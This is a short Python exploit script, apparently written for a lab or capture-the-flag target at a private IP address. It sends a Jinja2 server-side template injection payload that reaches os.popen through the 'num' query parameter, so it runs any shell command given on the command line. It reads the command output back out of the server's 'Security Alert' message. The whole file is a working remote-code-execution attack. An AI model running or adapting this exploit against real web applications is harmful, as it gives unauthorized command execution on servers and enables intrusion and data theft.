#!/usr/bin/env python3 import re import sys import urllib.error import urllib.parse import urllib.request HOST = '192.168.1.104' def run(cmd: str, timeout: int = 20) -> str: payload = "{{ config.__class__.__init__.__globals__['os'].popen(" + repr(cmd + " 2>&1") + ").read() }}" url = f'http://{HOST}:1212/?num=' + urllib.parse.quote(payload) try: data = urllib.request.urlopen(url, timeout=timeout).read() except urllib.error.HTTPError as e: data = e.read() html = data.decode('latin1', 'ignore') match = re.search(r"Security Alert: Malicious string '(.*?)' detected", html, re.S) if match: return match.group(1) return html if __name__ == '__main__': command = ' '.join(sys.argv[1:]) if len(sys.argv) > 1 else 'id' print(run(command), end='')